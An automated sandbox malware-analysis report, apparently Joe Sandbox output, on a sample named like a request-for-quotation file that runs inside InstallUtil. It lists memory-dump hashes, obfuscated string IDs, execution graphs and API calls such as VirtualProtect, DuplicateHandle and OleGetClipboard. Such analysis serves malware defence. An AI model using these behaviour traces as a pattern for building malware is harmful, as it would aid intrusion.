                                                                                                                          • Instruction ID: 9aa97b13c63118e6d7f255bff2280e97d415fc8c8d92e998c5ae3b1aba81e178
                                                                                                                          • Opcode Fuzzy Hash: 6c6641853ee18ce5f3f79faaaa0306e5ea957c9db5bcbdf56a2c8b5dc2b433af
                                                                                                                          • Instruction Fuzzy Hash: 65E1DE307042559FCB15DF69C480A6EBBA6FF89304F56C5A8E809CB3A5CB34EC46CB91
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                          • API String ID: 0-2049395529
                                                                                                                          • Opcode ID: 1094baa06fa905ad6a9d4ff38d2b1c609e65b50d456b46e471ac5d0f007e0a46
                                                                                                                          • Instruction ID: a6accc8cf444414d883cddc0b6f95fdde4305e3627f151ec35e2c753e27c3e86
                                                                                                                          • Opcode Fuzzy Hash: 1094baa06fa905ad6a9d4ff38d2b1c609e65b50d456b46e471ac5d0f007e0a46
                                                                                                                          • Instruction Fuzzy Hash: A1F097B1B8010B6BAA3C187D1024A2947E39BC0B86720442AC081DF34CEE21DEC68386
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )$3$TJcq$Te^q
                                                                                                                          • API String ID: 0-123536998
                                                                                                                          • Opcode ID: f11b352595e2f904efbaaa121f9d49a272704683e99968473d9340ad5ab225e7
                                                                                                                          • Instruction ID: 14a0c39afea0f61b4264132083791a75233b8d2bb548c0c273b55879fe2248d1
                                                                                                                          • Opcode Fuzzy Hash: f11b352595e2f904efbaaa121f9d49a272704683e99968473d9340ad5ab225e7
                                                                                                                          • Instruction Fuzzy Hash: 37019274A04259DFDB50CF59C994BEDB7B2BB45700F608199D409AB244DB706E85CF44

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:5.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:63
                                                                                                                          Total number of Limit Nodes:4
                                                                                                                          execution_graph 151747 5796058 151748 5796059 GetCurrentProcess 151747->151748 151750 57960f0 GetCurrentThread 151748->151750 151753 57960e9 151748->151753 151751 579612d GetCurrentProcess 151750->151751 151752 5796126 151750->151752 151754 5796163 151751->151754 151752->151751 151753->151750 151763 5795e74 151754->151763 151757 579624b DuplicateHandle 151761 57962fe 151757->151761 151758 57961a6 GetCurrentThreadId 151762 57961e1 151758->151762 151764 5796268 DuplicateHandle 151763->151764 151766 5796194 151764->151766 151766->151757 151766->151758 151801 5796338 151802 5796343 151801->151802 151803 5796353 151802->151803 151805 5795e8c 151802->151805 151806 5796388 OleInitialize 151805->151806 151808 57963ec 151806->151808 151808->151803 151767 50ab5a8 151769 50ab5c3 151767->151769 151768 50ab7e4 151769->151768 151771 50abff8 151769->151771 151772 50ac018 151771->151772 151773 50ac123 151772->151773 151776 50d9319 151772->151776 151780 50d9328 151772->151780 151773->151769 151777 50d9320 151776->151777 151784 50d97a9 151777->151784 151778 50d937e 151778->151773 151781 50d934c 151780->151781 151783 50d97a9 2 API calls 151781->151783 151782 50d937e 151782->151773 151783->151782 151785 50d97ac 151784->151785 151789 50da400 151785->151789 151793 50da410 151785->151793 151786 50d97d2 151786->151778 151790 50da404 151789->151790 151791 50da471 MonitorFromPoint 151790->151791 151792 50da4a2 151790->151792 151791->151792 151792->151786 151794 50da411 151793->151794 151795 50da471 MonitorFromPoint 151794->151795 151796 50da4a2 151794->151796 151795->151796 151796->151786 151797 57964d0 151798 57964d5 OleGetClipboard 151797->151798 151800 579656a 151798->151800 151809 990f60 151810 990f74 151809->151810 151812 995155 151809->151812 151815 999140 151812->151815 151817 999153 151815->151817 151819 9991f0 151817->151819 151820 999238 VirtualProtect 151819->151820 151822 995174 151820->151822 151739 50a0390 151741 50a0394 151739->151741 151743 9993a0 151741->151743 151744 9993e0 CloseHandle 151743->151744 151746 999411 151744->151746 151735 50da500 151736 50da501 KiUserCallbackDispatcher 151735->151736 151738 50da599 151736->151738
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                          • API String ID: 0-312445597
                                                                                                                          • Opcode ID: 48624c0524b2b7feff993a60740157367179855e613b32c50b24ce7242af0d7a
                                                                                                                          • Instruction ID: 0880c78a4b06640c3d2611d98ac28c54434e710ae0055b3e41e813223091288f
                                                                                                                          • Opcode Fuzzy Hash: 48624c0524b2b7feff993a60740157367179855e613b32c50b24ce7242af0d7a
                                                                                                                          • Instruction Fuzzy Hash: EFB21934A00228CFDB14CFAAC994BADB7B6FB88704F148595E505AB3A5DB70ED45CF90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,bq$4$$^q$$^q$$^q$$^q
                                                                                                                          • API String ID: 0-2546334966
                                                                                                                          • Opcode ID: 91e34c472efe6d1c48968ab53f5929ffc463b21a4b8974d3b2adaee6bcc310a2
                                                                                                                          • Instruction ID: 68e913e411736b8849dc5a23084c1ae7bc1998c4d07aea5ea9a8047a66fbfc2f
                                                                                                                          • Opcode Fuzzy Hash: 91e34c472efe6d1c48968ab53f5929ffc463b21a4b8974d3b2adaee6bcc310a2
                                                                                                                          • Instruction Fuzzy Hash: 4322EB34A00228CFDB14DF66C994BADB7B2FF48304F1485A9D509AB2A5DB71ED86CF50
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (_^q$Pl^q$$^q
                                                                                                                          • API String ID: 0-912065397
                                                                                                                          • Opcode ID: 99df1d69cc765104b39233121c819140dc328f8d007492bef057b49d71e46707
                                                                                                                          • Instruction ID: fb6c0a4ac9e16fe571ef61e9990b0daac7d53305fca7a125242ec991f3c5941d
                                                                                                                          • Opcode Fuzzy Hash: 99df1d69cc765104b39233121c819140dc328f8d007492bef057b49d71e46707
                                                                                                                          • Instruction Fuzzy Hash: B8422834B002488FCB14DF6AC584A7A77E6AF89710B1584A9E906CB375EB35FD82CB51
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: fcq$UQ
                                                                                                                          • API String ID: 0-4237912776
                                                                                                                          • Opcode ID: 4bcdd3e7de9761cb16ebe0c350ac407370353a6bd197455e425d15d14a31fc63
                                                                                                                          • Instruction ID: 84590cd8821789b660b0a7512f90b0bff7840f6632169dd1af37c5e5d666aa60
                                                                                                                          • Opcode Fuzzy Hash: 4bcdd3e7de9761cb16ebe0c350ac407370353a6bd197455e425d15d14a31fc63
                                                                                                                          • Instruction Fuzzy Hash: 4E61F4B4E04108DFDB08DFA9E455BADBBF1FF44304F218069D416AB2A0D779A94ADF11
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: fcq$UQ
                                                                                                                          • API String ID: 0-4237912776
                                                                                                                          • Opcode ID: 65b04133cbc831546a3af094fa850da9e41c1f59155a38f7ff7bdf30b7805dcf
                                                                                                                          • Instruction ID: 1d6f1901b6e759219a8d729dea035f3b0ce482930f435990d699137496139819
                                                                                                                          • Opcode Fuzzy Hash: 65b04133cbc831546a3af094fa850da9e41c1f59155a38f7ff7bdf30b7805dcf
                                                                                                                          • Instruction Fuzzy Hash: 9D51B274E05108DFCB08DFA9E455BADB7F1FF88304F118069D416AB2A0DB75A98ADF11
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq
                                                                                                                          • API String ID: 0-149360118
                                                                                                                          • Opcode ID: 8f73d3e9d5cc0e6a139ad4400c157f3bdd39a537e7b5c5883603769679c912cd
                                                                                                                          • Instruction ID: 29c6f5cf4ca6d94885b81766c67eaf1fe011e86d9561498d7045b3db6be4d707
                                                                                                                          • Opcode Fuzzy Hash: 8f73d3e9d5cc0e6a139ad4400c157f3bdd39a537e7b5c5883603769679c912cd
                                                                                                                          • Instruction Fuzzy Hash: EF326974B006158FCB58DF69C89466EBBF2FF88300F288529E65AD7781DB34AD05CB90
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Te^q
                                                                                                                          • API String ID: 0-671973202
                                                                                                                          • Opcode ID: 77afff33a9efff887f11283c7adefbf35a23df467acbf73446d4f6f6d1ddd720
                                                                                                                          • Instruction ID: 0d139e0c99aaa176c455d3a83a97d1d19a7e5de20def9193671722d58ccc474e
                                                                                                                          • Opcode Fuzzy Hash: 77afff33a9efff887f11283c7adefbf35a23df467acbf73446d4f6f6d1ddd720
                                                                                                                          • Instruction Fuzzy Hash: 9C5181B4744100DFD708DB69E4B9BAA73F3BB84305F2581A5E8068B2B4DB75AC86DB41
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 21be4a82e0966654156eeab796138e8dd44d8e67a3ead8bcc6b397320ba843ad
                                                                                                                          • Instruction ID: df26fbc4e63d72faf78478535059905bf5aa9148cb0264df9d310e33a911ebbc
                                                                                                                          • Opcode Fuzzy Hash: 21be4a82e0966654156eeab796138e8dd44d8e67a3ead8bcc6b397320ba843ad
                                                                                                                          • Instruction Fuzzy Hash: 29A1BFB4B04205EFEB04CF59E4B5BE977F2FB85304F1481A4D805AB2A8E775E886DB11
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 305a9c82a88554f78f11d24c0e235e652f093b3054ca1a979874cbd4b3349b56
                                                                                                                          • Instruction ID: 59779e04f2812248cfbbc1b0c129bcac201971ecf0db4fa663ec2804264e4dde
                                                                                                                          • Opcode Fuzzy Hash: 305a9c82a88554f78f11d24c0e235e652f093b3054ca1a979874cbd4b3349b56
                                                                                                                          • Instruction Fuzzy Hash: 27A1AFB8B04105EFEB04CF59E4B4BA977F2FB85304F5481A0D805AB2B8E775E986DB10
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c92d42389eb962f8c72a71b472de8b40871f746a70706b383bdae6ea56724fb4
                                                                                                                          • Instruction ID: 18f52da12fef0a4721179ba3eef9acc70f39cdb0e5c0e3f65d06c725fe4714cf
                                                                                                                          • Opcode Fuzzy Hash: c92d42389eb962f8c72a71b472de8b40871f746a70706b383bdae6ea56724fb4
                                                                                                                          • Instruction Fuzzy Hash: 6451E734B0464287EB5E2A7998A827F65A7CFD4700F0545FE8B82873C5DEACBC0672D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c1e1aa59474c465764e9dc4cf302e9396126595aca9fd85da76be4ded3133096
                                                                                                                          • Instruction ID: 5fd6c190972b8cc066c1167340eb78d40741985247af1210c4eff0e7b4e26a36
                                                                                                                          • Opcode Fuzzy Hash: c1e1aa59474c465764e9dc4cf302e9396126595aca9fd85da76be4ded3133096
                                                                                                                          • Instruction Fuzzy Hash: 1151AE35B0060287EB5E2A7A98A837F609BCFD4700F1485BD8B42873C5DEADBC0662D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6795de7131199ecc27ec1911634b65f04dc85bf90c63b43049d2ddb1548ed006
                                                                                                                          • Instruction ID: dfd3a6eeb86f95a6028dbec4f07d6df29e186676704081b383d08a43f72bf6ef
                                                                                                                          • Opcode Fuzzy Hash: 6795de7131199ecc27ec1911634b65f04dc85bf90c63b43049d2ddb1548ed006
                                                                                                                          • Instruction Fuzzy Hash: 1B61AF387441008FD758DF6AC955B6A77E3EB88304F258069E6018B7B9DB79EC87DB80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4b831dadf358e5334c0de49c28c708c185e3a9701382367fb5f81d76bcea5b3a
                                                                                                                          • Instruction ID: e0c2f55e6414f1a15200080606b254b855606c652e3b951bbb48b7b3c151dbc5
                                                                                                                          • Opcode Fuzzy Hash: 4b831dadf358e5334c0de49c28c708c185e3a9701382367fb5f81d76bcea5b3a
                                                                                                                          • Instruction Fuzzy Hash: 0D619E387441008FD758EF2AC955B2A77A3EBC8704F258069E6018B7B9CB79EC47DB80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6ff841de97f1cd0e14052d2e556746fa2b578ed0f6498a4c25dcf897a93099db
                                                                                                                          • Instruction ID: ae354c06bfb1546622df7d9fe177372affa2b226076ac90d47c8c4b63e69caca
                                                                                                                          • Opcode Fuzzy Hash: 6ff841de97f1cd0e14052d2e556746fa2b578ed0f6498a4c25dcf897a93099db
                                                                                                                          • Instruction Fuzzy Hash: 1B617938A04104DFDB44CF6AD849BA977F3FB88315F258064E201AB7A6D779AD86DF40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8db58c2f3c6016103fbef22fa2613567082a038e386bd9425fbe99be406a675b
                                                                                                                          • Instruction ID: c64508d256775d0b6539a4af4360d7807aaaab8904fe4cb0b58f0d307b30cc41
                                                                                                                          • Opcode Fuzzy Hash: 8db58c2f3c6016103fbef22fa2613567082a038e386bd9425fbe99be406a675b
                                                                                                                          • Instruction Fuzzy Hash: 75516A38A04104DFDB84CF5AD849BA977B3FB88315F658064E301AB7A6C779AD85DF40

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 633 4ce7c90-4ce7cdc 637 4ce7e5a-4ce7ec6 633->637 638 4ce7ce2-4ce7cf4 633->638 650 4ce7ecc-4ce7ed5 637->650 651 4ce8115-4ce811c 637->651 641 4ce7cf6-4ce7d42 638->641 642 4ce7d44-4ce7d8d 638->642 674 4ce7d90-4ce7da4 641->674 642->674 654 4ce7f4b-4ce7f64 650->654 655 4ce7ed7-4ce7edb 650->655 666 4ce7f6a 654->666 667 4ce8091-4ce80a1 654->667 657 4ce7edd-4ce7ef2 655->657 658 4ce7ef4-4ce7f00 655->658 660 4ce7f09-4ce7f46 657->660 658->660 660->651 670 4ce7fb9-4ce7ffc 666->670 671 4ce8049-4ce808c 666->671 672 4ce7f71-4ce7fb4 666->672 673 4ce8001-4ce8044 666->673 676 4ce80ba-4ce80c6 667->676 677 4ce80a3-4ce80b8 667->677 670->651 671->651 672->651 673->651 680 4ce7daf-4ce7dd0 674->680 683 4ce80cf-4ce8110 676->683 677->683 688 4ce7dda-4ce7de4 680->688 689 4ce7dd2-4ce7dd8 680->689 683->651 690 4ce7de7-4ce7e2a 688->690 689->690 697 4ce7e2c-4ce7e48 690->697 698 4ce7e50-4ce7e57 690->698 697->698
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                                                                          • API String ID: 0-723292480
                                                                                                                          • Opcode ID: 17dcc2e36186aeb99321058821d3edff755f1e01d79a1a7cb40ee99909552c9b
                                                                                                                          • Instruction ID: d178c388ca4af7a2c20861e3f9ee53877bd11aec0f3e3df0c488a282b0409845
                                                                                                                          • Opcode Fuzzy Hash: 17dcc2e36186aeb99321058821d3edff755f1e01d79a1a7cb40ee99909552c9b
                                                                                                                          • Instruction Fuzzy Hash: 3DD15D36A40114DFCB09DFA5C944EA9BBB2FF88310F058498E5096B276D732ED56DB90

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 701 5796058-57960e7 GetCurrentProcess 706 57960e9-57960ef 701->706 707 57960f0-5796124 GetCurrentThread 701->707 706->707 708 579612d-5796161 GetCurrentProcess 707->708 709 5796126-579612c 707->709 711 579616a-57961a0 call 5795e74 708->711 712 5796163-5796169 708->712 709->708 717 579624b-57962fc DuplicateHandle 711->717 718 57961a6-57961df GetCurrentThreadId 711->718 712->711 725 57962fe-5796304 717->725 726 5796305-5796322 717->726 722 57961e8-579624a 718->722 723 57961e1-57961e7 718->723 723->722 725->726
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 057960D6
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 05796113
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 05796150
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 057961CE
                                                                                                                          • DuplicateHandle.KERNELBASE(00000000,00000000,0572797C,?,00000000,050D9C4C,00000000,?,?,?,?), ref: 057962EF
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread$DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4285418203-0
                                                                                                                          • Opcode ID: 55be374e71ebcf16f2fd1b99dd439eeba1f96c5e5ff1f944a7e08fb3c97b9484
                                                                                                                          • Instruction ID: c31c4f28e5d2ec9a0dddff7056d910bb6726193cf2f414a35f9315d9a6de9068
                                                                                                                          • Opcode Fuzzy Hash: 55be374e71ebcf16f2fd1b99dd439eeba1f96c5e5ff1f944a7e08fb3c97b9484
                                                                                                                          • Instruction Fuzzy Hash: CF9132B0D012099FCB14CFAAD988B9EFBF5FB48314F10852AE419A7361DB34A844CF65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 734 5796048-5796052 735 5796059-57960e7 GetCurrentProcess 734->735 736 5796054-5796057 734->736 740 57960e9-57960ef 735->740 741 57960f0-5796124 GetCurrentThread 735->741 736->735 740->741 742 579612d-5796161 GetCurrentProcess 741->742 743 5796126-579612c 741->743 745 579616a-579618f call 5795e74 742->745 746 5796163-5796169 742->746 743->742 749 5796194-57961a0 745->749 746->745 751 579624b-579626c 749->751 752 57961a6-57961df GetCurrentThreadId 749->752 758 579626d-57962fc DuplicateHandle 751->758 756 57961e8-579624a 752->756 757 57961e1-57961e7 752->757 757->756 759 57962fe-5796304 758->759 760 5796305-5796322 758->760 759->760
                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 057960D6
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 05796113
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 05796150
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 057961CE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2083260376.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_5790000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2063062207-0
                                                                                                                          • Opcode ID: ad0363b0391727992006e8da552b3023d66ed533ce15e420e580858a1b5ede5f
                                                                                                                          • Instruction ID: a58c40f85ada5d44b7184a4d01aa96f17a39e0ca10647a62ef6bd18a1171faf6
                                                                                                                          • Opcode Fuzzy Hash: ad0363b0391727992006e8da552b3023d66ed533ce15e420e580858a1b5ede5f
                                                                                                                          • Instruction Fuzzy Hash: 495135B0D016098FCB18CFAAD988B9EFBF1BF49304F10C52AE419A7261DB349844CF65

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 916 4cf3f68-4cf3fa1 919 4cf4017-4cf403c 916->919 920 4cf3fa3-4cf3faf 916->920 924 4cf4043-4cf40a8 919->924 923 4cf3fb5-4cf3fcb 920->923 920->924 931 4cf3fde-4cf3ffa 923->931 932 4cf3fcd-4cf3fdc 923->932 942 4cf40aa-4cf40ac 924->942 943 4cf40d0-4cf40de 924->943 938 4cf3ffc-4cf4002 931->938 939 4cf4004 931->939 932->931 941 4cf4008-4cf4014 938->941 939->941 944 4cf414b-4cf4170 942->944 945 4cf40b2-4cf40b7 942->945 950 4cf4113-4cf411e 943->950 951 4cf40e0-4cf40ee 943->951 953 4cf4177-4cf419b 944->953 948 4cf40b9-4cf40bb 945->948 949 4cf40c1-4cf40cd 945->949 948->949 948->953 961 4cf410c-4cf4110 950->961 962 4cf4120-4cf4144 950->962 959 4cf4104-4cf4106 951->959 960 4cf40f0-4cf4101 951->960 964 4cf41a2-4cf41f5 953->964 959->961 959->964 962->944 975 4cf41f7-4cf420d 964->975 976 4cf4250-4cf42a2 964->976 981 4cf420f-4cf421a call 4cf42d8 975->981 982 4cf4225-4cf423d 975->982 990 4cf42ba-4cf42d2 976->990 991 4cf42a4-4cf42aa 976->991 984 4cf421d-4cf4222 981->984 987 4cf423f 982->987 988 4cf4248-4cf424d 982->988 987->988 992 4cf42ae-4cf42b0 991->992 993 4cf42ac 991->993 992->990 993->990
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (bq$(bq$(bq$Hbq
                                                                                                                          • API String ID: 0-2483291755
                                                                                                                          • Opcode ID: a63069ce287411bea7d2df02728e9ba49a7fd71fc35e5f0b8c59ee6554609d24
                                                                                                                          • Instruction ID: cf9d61ab8ff061f91f059183b997c9fce8a13fa5a9d78a90835a3935f7303800
                                                                                                                          • Opcode Fuzzy Hash: a63069ce287411bea7d2df02728e9ba49a7fd71fc35e5f0b8c59ee6554609d24
                                                                                                                          • Instruction Fuzzy Hash: 919169313042548FE71AAB39985062E7BB3EFD5310B1585BAD605CF392DE34ED06C799

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 997 4ceb72f-4ceb75b 998 4ceb761-4ceb773 call 4ce3e48 997->998 1001 4ceb77c-4ceb77f 998->1001 1002 4ceb775 998->1002 1003 4cebde5-4cebdf1 1001->1003 1004 4ceb785-4ceb788 1001->1004 1002->1001 1005 4cebdff-4cebe28 1003->1005 1006 4cebdf3-4cebdf5 1003->1006 1007 4ceb78e-4ceb79a 1004->1007 1008 4cebf5c-4cec00d 1004->1008 1013 4cebe2e-4cebe30 1005->1013 1014 4cebe2a-4cebe2c 1005->1014 1006->1005 1009 4ceb79c-4ceb79e 1007->1009 1010 4ceb7a8-4ceb7e9 1007->1010 1009->1010 1023 4cebf52-4cebf59 1010->1023 1018 4cebe37-4cebe39 1013->1018 1014->1013 1017 4cebe32 1014->1017 1017->1018 1019 4cebe3b-4cebe63 1018->1019 1020 4cebe65-4cebe9f call 4cea578 1018->1020 1032 4cebea4-4cebec1 1019->1032 1020->1032 1032->1023
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (_^q$(_^q$(_^q$(_^q
                                                                                                                          • API String ID: 0-2697572114
                                                                                                                          • Opcode ID: 5dc43116fe41952072adfa84667ecf6566c20a6d665560d274b8665cdc522251
